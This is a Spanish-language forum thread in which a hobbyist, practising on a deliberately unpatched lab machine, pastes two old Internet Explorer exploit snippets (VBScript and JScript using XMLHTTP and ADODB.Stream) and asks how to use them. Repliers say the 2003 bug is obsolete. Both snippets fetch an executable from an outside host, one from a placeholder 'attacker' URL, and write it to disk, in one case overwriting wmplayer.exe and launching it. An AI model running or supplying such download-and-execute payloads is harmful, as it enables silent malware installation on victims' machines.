Resulta que soy nuevo en esto pero no newbie, ya antes habia utilizado exploit que estaban aqui, y todo ellos estaban en c, y en perl pero este esta en otro lenguaje que no conozco, y lo encontre en una maquina que tengo especialmente para ser hackeada (para poder aprender) , pase el SSS y me arrojo u bug critico que esta aqui
http://www.securityfocus.com/bid/10514 con su respectivo exploit

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",
false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite

</script>

This proof-of-concept was subsequently released by Jelmer to demonstrate how the issue may be used to overwrite wmplayer.exe:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

y no entiendo muy bien como usarlo y su funcionalidad.
Me pueden ayudar a entenderlo por lo menos, y alguna sugerencia de como usarlo.

saludos

Me atrevería a decir que ese código ya está obsoleto debido a su antiguedad (2003)
Es más, fue nombrado ese exploit hará bastante aquí en este foro y diría que se llegó a la conclusión de que ya no funcionaba.

Suerte.

asi es GreenDeviL, el bug es viejo, pero como dije anteriormente, çtengo un pc en donde jugar a ser Hacker xd xd xd , y este pc no tiene las actualizaciones necesarias por lomismo, para poder entender los exploit y poder explotar las vulnerabilidades.

Sdc gracias por la info pero lo unico que no entendi es el HTA, me puedes decir que es ?

saludos